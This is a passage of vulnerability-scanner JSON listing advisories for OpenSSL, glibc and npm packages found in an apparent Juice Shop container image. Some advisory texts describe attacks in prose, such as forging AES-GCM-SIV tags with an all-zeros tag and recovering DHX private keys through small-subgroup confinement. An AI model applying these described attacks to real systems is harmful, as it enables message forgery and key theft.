application using these ciphers.\n\nAES-SIV (RFC 5297) and AES-GCM-SIV (RFC 8452) are nonce-misuse-resistant AEAD\nmodes: they accept a key, nonce, optional AAD (bytes that are authenticated\nbut not encrypted), and plaintext, and produces ciphertext plus a 16-byte\ntag. On decrypt, `EVP_DecryptFinal_ex()` is documented to return success only\nif the tag is verified succesfully.\n\nIn OpenSSL's provider implementation of these ciphers, the expected tag is\ncomputed only when decryption function is invoked with non-empty data.\nIf the caller supplies AAD and then calls `EVP_DecryptFinal_ex()` without\ninvocation of the ciphertext update, which can happen when the received\nciphertext length is zero, the tag is never recalculated and still holds its\nall-zeros value.\n\nWhen AES-GCM-SIV is used, an attacker who sends arbitrary AAD, empty\nciphertext, and all-zeros tag passes authentication under any key they do not\nknow, single-shot. When AES-SIV is used, for mounting the attack it's\nnecessary for the application to reuse the decryption context without\nresetting the key.\n\nAES-SIV is implemented since OpenSSL 3.0. AES-GCM-SIV is implemented since\nOpenSSL 3.2.\n\nNo protocols implemented in OpenSSL itself (TLS/CMS/PKCS7/HPKE/QUIC) support\neither AES-GCM-SIV or AES-SIV. To mount an attack, the applications must\nimplement their own protocol and use the EVP interface. Also they must skip the\nciphertext update when a message with an empty ciphertext arrives.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this\nissue, as these algorithms are not FIPS approved and the affected code is\noutside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","metrics":{"baseScore":4.8,"exploitabilityScore":2.3,"impactScore":2.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-45446","epss":0.0021,"percentile":0.11122,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-45446","cwe":"CWE-325","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-45446","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"CVE-2026-4438","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-4438","namespace":"debian:distro:debian:13","severity":"Medium","urls":[],"description":"Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C library version 2.34 to version 2.43 could result in an invalid DNS hostname being returned to the caller in violation of the DNS specification.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N","metrics":{"baseScore":5.4,"exploitabilityScore":2.9,"impactScore":2.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-4438","epss":0.00189,"percentile":0.08602,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-4438","cwe":"CWE-20","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"},{"cve":"CVE-2026-4438","cwe":"CWE-88","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary"}],"fix":{"versions":["2.41-12+deb13u3"],"state":"fixed","available":[{"version":"2.41-12+deb13u3","date":"2026-05-17","kind":"first-observed"}]},"advisories":[],"risk":0.09828},"relatedVulnerabilities":[{"id":"CVE-2026-4438","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-4438","namespace":"nvd:cpe","severity":"Medium","urls":["https://sourceware.org/bugzilla/show_bug.cgi?id=34015"],"description":"Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C library version 2.34 to version 2.43 could result in an invalid DNS hostname being returned to the caller in violation of the DNS specification.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N","metrics":{"baseScore":5.4,"exploitabilityScore":2.9,"impactScore":2.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-4438","epss":0.00189,"percentile":0.08602,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-4438","cwe":"CWE-20","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"},{"cve":"CVE-2026-4438","cwe":"CWE-88","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-4438","versionConstraint":"< 2.41-12+deb13u3 (deb)"},"fix":{"suggestedVersion":"2.41-12+deb13u3"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"CVE-2026-42770","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-42770","namespace":"debian:distro:debian:13","severity":"Low","urls":[],"description":"Issue summary: When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the peer key is not properly checked for the subgroup membership. Impact summary: A malicious peer which presents an X9.42 key carrying the victim's p and g parameters, a forged q = r (a small prime factor of the cofactor (p−1)/q_local), and a public value Y of order r can recover the victim's private key after a small number of key exchange attempts. When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the subgroup membership check Y^q ≡ 1 (mod p) is performed using the peer's own q parameter, not the local key's q. The peer's domain parameters are then matched against the domain parameters of the private key, but the value of q is not compared. A malicious peer who presents an X9.42 key carrying the victim's p, g, a forged q = r (a small prime factor of the cofactor), and a public value Y of order r passes all checks. The shared secret then takes only r distinct values, leaking priv mod r. Repeating for each small-prime factor of the cofactor and combining via CRT recovers the full private key (Lim–Lee / small-subgroup-confinement attack). The realistic attack surface is narrow: principally CMP deployments with long-lived RA/CA DHX keys and bespoke enterprise or government applications using X9.42 DHX static keys with interactive protocols and therefore this issue was assigned Low severity. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are affected by this issue.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","metrics":{"baseScore":3.7,"exploitabilityScore":2.3,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-42770","epss":0.00249,"percentile":0.15886,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-42770","cwe":"CWE-325","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-09","kind":"advisory"}]},"advisories":[{"id":"DSA-6335-1","link":"https://security-tracker.debian.org/tracker/DSA-6335-1"}],"risk":0.083415},"relatedVulnerabilities":[{"id":"CVE-2026-42770","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-42770","namespace":"nvd:cpe","severity":"Low","urls":["https://github.com/openssl/openssl/commit/3da5a516cd2635a320ff748503db2cef7c4b0f02","https://github.com/openssl/openssl/commit/3ddbb7ab50bd93dfc59cbe08e269a67605aeebdb","https://github.com/openssl/openssl/commit/5f452bba2c681423d8fcffd120a19b757ee42e3c","https://github.com/openssl/openssl/commit/7fbfde7677ed8808828bf00ff01c937ca04bdda2","https://github.com/openssl/openssl/commit/ca2237ab5615641b662183b077f62c08d75e8070","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue summary: When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42)\npeer key, the peer key is not properly checked for the subgroup membership.\n\nImpact summary: A malicious peer which presents an X9.42 key carrying the\nvictim's p and g parameters, a forged q = r (a small prime factor of the\ncofactor (p−1)/q_local), and a public value Y of order r can recover the\nvictim's private key after a small number of key exchange attempts.\n\nWhen EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the\nsubgroup membership check Y^q ≡ 1 (mod p) is performed using the peer's\nown q parameter, not the local key's q. The peer's domain parameters are\nthen matched against the domain parameters of the private key, but the value\nof q is not compared.\n\nA malicious peer who presents an X9.42 key carrying the victim's p, g,\na forged q = r (a small prime factor of the cofactor), and a public\nvalue Y of order r passes all checks. The shared secret then takes only\nr distinct values, leaking priv mod r. Repeating for each small-prime\nfactor of the cofactor and combining via CRT recovers the full private\nkey (Lim–Lee / small-subgroup-confinement attack).\n\nThe realistic attack surface is narrow: principally CMP deployments with\nlong-lived RA/CA DHX keys and bespoke enterprise or government applications\nusing X9.42 DHX static keys with interactive protocols and therefore this\nissue was assigned Low severity.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are affected by this\nissue.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","metrics":{"baseScore":3.7,"exploitabilityScore":2.3,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-42770","epss":0.00249,"percentile":0.15886,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-42770","cwe":"CWE-325","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-42770","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"GHSA-vpq2-c234-7xj6","dataSource":"https://github.com/advisories/GHSA-vpq2-c234-7xj6","namespace":"github:language:javascript","severity":"Low","urls":["https://nvd.nist.gov/vuln/detail/CVE-2026-3449","https://github.com/TooTallNate/once/issues/8","https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a","https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612","https://github.com/TooTallNate/once/releases/tag/v2.0.1"],"description":"@tootallnate/once vulnerable to Incorrect Control Flow Scoping","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","metrics":{"baseScore":3.3,"exploitabilityScore":1.9,"impactScore":1.5},"vendorMetadata":{}},{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P","metrics":{"baseScore":1.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-3449","epss":0.00112,"percentile":0.01631,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-3449","cwe":"CWE-705","source":"report@snyk.io","type":"Secondary"}],"fix":{"versions":["2.0.1"],"state":"fixed","available":[{"version":"2.0.1","date":"2026-05-21","kind":"first-observed"}]},"advisories":[],"risk":0.03135999999999999},"relatedVulnerabilities":[{"id":"CVE-2026-3449","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-3449","namespace":"nvd:cpe","severity":"Low","urls":["https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a","https://github.com/TooTallNate/once/issues/8","https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612"],"description":"Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.","cvss":[{"source":"report@snyk.io","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":1.9},"vendorMetadata":{}},{"source":"report@snyk.io","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","metrics":{"baseScore":3.3,"exploitabilityScore":1.9,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-3449","epss":0.00112,"percentile":0.01631,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-3449","cwe":"CWE-705","source":"report@snyk.io","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"@tootallnate/once","version":"1.1.2"}},"found":{"vulnerabilityID":"GHSA-vpq2-c234-7xj6","versionConstraint":"<2.0.1 (semantic)"},"fix":{"suggestedVersion":"2.0.1"}}],"artifact":{"id":"pkg:npm/%40tootallnate/once@1.1.2?package-id=eeeda4243db3c868","name":"@tootallnate/once","version":"1.1.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/@tootallnate/once/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:\\@tootallnate\\/once:\\@tootallnate\\/once:1.1.2:*:*:*:*:*:*:*","cpe:2.3:a:TooTallNate:\\@tootallnate\\/once:1.1.2:*:*:*:*:*:*:*"],"purl":"pkg:npm/%40tootallnate/once@1.1.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-5mrr-rgp6-x4gr","dataSource":"https://github.com/advisories/GHSA-5mrr-rgp6-x4gr","namespace":"github:language:javascript","severity":"Critical","urls":["https://github.com/bkimminich/juice-shop/issues/1173","https://www.npmjs.com/advisories/1122"],"description":"Command Injection in marsdb","cvss":[],"fix":{"versions":[],"state":"not-fixed"},"advisories":[],"risk":0},"relatedVulnerabilities":[],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"marsdb","version":"0.6.11"}},"found":{"vulnerabilityID":"GHSA-5mrr-rgp6-x4gr","versionConstraint":">=0.0.0 (semantic)"}}],"artifact":{"id":"pkg:npm/marsdb@0.6.11?package-id=92d5870e9d43058d","name":"marsdb","version":"0.6.11","type":"npm","locations":[{"path":"/juice-shop/node_modules/marsdb/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:marsdb:marsdb:0.6.11:*:*:*:*:*:*:*","cpe:2.3:a:c58:marsdb:0.6.11:*:*:*:*:*:*:*"],"purl":"pkg:npm/marsdb@0.6.11","upstreams":[]}},{"vulnerability":{"id":"GHSA-gjcw-v447-2w7q","dataSource":"https://github.com/advisories/GHSA-gjcw-v447-2w7q","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/brianloveswords/node-jws/commit/585d0e1e97b6747c10cf5b7689ccc5618a89b299#diff-4ac32a78649ca5bdd8e0ba38b7006a1e","https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/","https://www.npmjs.com/advisories/88","https://nvd.nist.gov/vuln/detail/CVE-2016-1000223","https://snyk.io/vuln/npm:jws:20160726"],"description":"Forgeable Public/Private Tokens in jws","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N","metrics":{"baseScore":8.7,"exploitabilityScore":2.3,"impactScore":5.8},"vendorMetadata":{}}],"fix":{"versions":["3.0.0"],"state":"fixed","available":[{"version":"3.0.0","date":"2020-09-02","kind":"first-observed"}]},"advisories":[],"risk":0},"relatedVulnerabilities":[{"id":"CVE-2016-1000223","dataSource":"nvd","namespace":"nvd:cpe","severity":"Unknown","urls":[],"cvss":[]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"jws","version":"0.2.6"}},"found":{"vulnerabilityID":"GHSA-gjcw-v447-2w7q","versionConstraint":"<3.0.0 (semantic)"},"fix":{"suggestedVersion":"3.0.0"}}],"artifact":{"id":"pkg:npm/jws@0.2.6?package-id=e3ae0c46d846c3b2","name":"jws","version":"0.2.6","type":"npm","locations":[{"path":"/juice-shop/node_modules/jws/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:brianloveswords:jws:0.2.6:*:*:*:*:*:*:*","cpe:2.3:a:jws:jws:0.2.6:*:*:*:*:*:*:*"],"purl":"pkg:npm/jws@0.2.6","upstreams":[]}},{"vulnerability":{"id":"GHSA-96hv-2xvq-fx4p","dataSource":"https://github.com/advisories/GHSA-96hv-2xvq-fx4p","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p","https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7","https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53","https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94","https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8"],"description":"ws: Memory exhaustion DoS from tiny fragments and data chunks","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"fix":{"versions":["7.5.11"],"state":"fixed","available":[{"version":"7.5.11","date":"2026-06-15","kind":"first-observed"}]},"advisories":[],"risk":0},"relatedVulnerabilities":[{"id":"CVE-2026-48779","dataSource":"nvd","namespace":"nvd:cpe","severity":"Unknown","urls":[],"cvss":[]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"ws","version":"7.4.6"}},"found":{"vulnerabilityID":"GHSA-96hv-2xvq-fx4p","versionConstraint":">=7.0.0,<7.5.11 (semantic)"},"fix":{"suggestedVersion":"7.5.11"}}],"artifact":{"id":"pkg:npm/ws@7.4.6?package-id=670482146c83d660","name":"ws","version":"7.4.6","type":"npm","locations":[{"path":"/juice-shop/node_modules/engine.io/node_modules/ws/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:ws_project:ws:7.4.6:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/ws@7.4.6","upstreams":[]}},{"vulnerability":{"id":"GHSA-96hv-2xvq-fx4p","dataSource":"https://github.com/advisories/GHSA-96hv-2xvq-fx4p","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p","https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7","https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53","https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94","https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8"],"description":"ws: Memory exhaustion DoS from tiny fragments and data chunks","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"fix":{"versions":["8.21.0"],"state":"fixed","available":[{"version":"8.21.0","date":"2026-06-15","kind":"first-observed"}]},"advisories":[],"risk":0},"relatedVulnerabilities":[{"id":"CVE-2026-48779","dataSource":"nvd","namespace":"nvd:cpe","severity":"Unknown","urls":[],"cvss":[]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"ws","version":"8.17.1"}},"found":{"vulnerabilityID":"GHSA-96hv-2xvq-fx4p","versionConstraint":">=8.0.0,<8.21.0 (semantic)"},"fix":{"suggestedVersion":"8.21.0"}}],"artifact":{"id":"pkg:npm/ws@8.17.1?package-id=c740f277708480a9","name":"ws","version":"8.17.1","type":"npm","locations":[{"path":"/juice-shop/node_modules/ws/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:ws_project:ws:8.17.1:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/ws@8.17.1","upstreams":[]}},{"vulnerability":{"id":"GHSA-rvg8-pwq2-xj7q","dataSource":"https://github.com/advisories/GHSA-rvg8-pwq2-xj7q","namespace":"github:language:javascript","severity":"Medium","urls":["https://hackerone.com/reports/321687","https://github.com/brianloveswords/base64url/pull/25","https://github.com/brianloveswords/base64url/commit/4fbd954a0a69e9d898de2146557cc6e893e79542"],"description":"Out-of-bounds Read in base64url","cvss":[],"fix":{"versions":["3.0.0"],"state":"fixed","available":[{"version":"3.0.0","date":"2020-09-02","kind":"first-observed"}]},"advisories":[],"risk":0},"relatedVulnerabilities":[],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"base64url","version":"0.0.6"}},"found":{"vulnerabilityID":"GHSA-rvg8-pwq2-xj7q","versionConstraint":"<3.0.0 (semantic)"},"fix":{"suggestedVersion":"3.0.0"}}],"artifact":{"id":"pkg:npm/base64url@0.0.6?package-id=2f8a9d6c7656ba10","name":"base64url","version":"0.0.6","type":"npm","locations":[{"path":"/juice-shop/node_modules/base64url/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:brianloveswords:base64url:0.0.6:*:*:*:*:*:*:*","cpe:2.3:a:base64url:base64url:0.0.6:*:*:*:*:*:*:*"],"purl":"pkg:npm/base64url@0.0.6","upstreams":[]}},{"vulnerability":{"id":"GHSA-h67p-54hq-rp68","dataSource":"https://github.com/advisories/GHSA-h67p-54hq-rp68","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/nodeca/js-yaml/security/advisories/GHSA-h67p-54hq-rp68"],"description":"JS-YAML: Quadratic-complexity DoS in merge key handling via repeated aliases","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}}],"fix":{"versions":["4.2.0"],"state":"fixed","available":[{"version":"4.2.0","date":"2026-06-15","kind":"first-observed"}]},"advisories":[],"risk":0},"relatedVulnerabilities":[{"id":"CVE-2026-53550","dataSource":"nvd","namespace":"nvd:cpe","severity":"Unknown","urls":[],"cvss":[]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"js-yaml","version":"3.14.2"}},"found":{"vulnerabilityID":"GHSA-h67p-54hq-rp68","versionConstraint":"<=4.1.1 (semantic)"},"fix":{"suggestedVersion":"4.2.0"}}],"artifact":{"id":"pkg:npm/js-yaml@3.14.2?package-id=f7f3579a635a8337","name":"js-yaml","version":"3.14.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/js-yaml/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:nodeca:js-yaml:3.14.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/js-yaml@3.14.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-vmf3-w455-68vh","dataSource":"https://github.com/advisories/GHSA-vmf3-w455-68vh","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-vmf3-w455-68vh"],"description":"node-tar applies PAX size override to intermediary GNU long-name/long-link headers, causing tar parser interpretation differential (file smuggling)","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N","metrics":{"baseScore":6.9},"vendorMetadata":{}}],"fix":{"versions":["7.5.16"],"state":"fixed","available":[{"version":"7.5.16","date":"2026-06-15","kind":"first-observed"}]},"advisories":[],"risk":0},"relatedVulnerabilities":[{"id":"CVE-2026-53655","dataSource":"nvd","namespace":"nvd:cpe","severity":"Unknown","urls":[],"cvss":[]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"4.4.19"}},"found":{"vulnerabilityID":"GHSA-vmf3-w455-68vh","versionConstraint":"<=7.5.15 